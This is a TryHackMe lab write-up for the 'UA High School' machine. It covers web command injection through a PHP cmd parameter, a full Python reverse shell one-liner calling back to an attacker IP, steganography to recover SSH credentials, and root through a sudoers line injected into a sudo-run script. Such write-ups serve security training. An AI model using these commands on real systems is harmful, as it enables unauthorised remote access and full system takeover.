UA High School - A TryHackMe Writeup

Start the machine and let it fully boot.

When we run nmap we see that we only have ports 22 and 80 open.

Since we have port 80 open with Apache we know there is most likely a website hosted. By browsing to the IP we get this page

By viewing the page source we can see that the CSS sheet is stored in the /assets folder. If we run gobuster on the main / and also the /assets folder (with -x php,html to see what files we find) we discover that there is a php file in there.

The PHP file does not load anything, however I wonder if we can try exploiting it somehow.

By using the ?cmd=ls we get some sort of info

Using Base64 decode we can see that this translates to the directory of the assets folder.

So it does look like we have some sort of access using the LFI exploit. Now we can navigate around and we can find a user, as well as the user.txt. However, we do not have permissions to view it because we are still the www-data user. We have to find another way to gain access.

We can get a reverse shell through python by going to revshells.com, selecting Python3#2. Make sure the IP and port are correct and start a netcat listener on your machine (nc -lvnp 4444) and then paste this code in your php?cmd=

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP-ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Once you hit enter, your nc listener should automatically connect to the device

We are still www-data user though so we're not able to view user.txt.

We can poke around the system and find the user deku, but we also find a Hidden-Content folder as well as a oneforall.jpg file in the assets/images folder. The Hidden-Content folder gives us a passphrase file, but this password isn't successful when trying to ssh using the deku user. Back to the oneforall.jpg. When running file on this, we see it shows as a data file, not a JPG file. This tell us that something was alterted with it. I downloaded the file to my local machine and edited the magic numbers to the correct jpg file using hexeditor.

and now when running file on it, it shows as a correct jpg file and we can actually open and view the picture

Viewing the pic doesn't give us anything, but we still have that passphrase, so lets see if there is anything hidden with steghide

It now gives us a creds.txt file, which has the user:pass to SSH in as deku. So now that we are in as deku, we can view the user.txt file.

Now if we run sudo -l as deku, we can see that anyone can run a feedback.sh script

After running the feedback form a few times I tried to see if we could run a command to add deku to the sudoers file.

deku ALL =NOPASSWD: ALL >> /etc/sudoers

after running this and then checking sudo -l again, we show that it was added successfully. If we run sudo /bin/bash we now have root access and can navigate to the root folder to view the root.txt file.

Last updated 12 months ago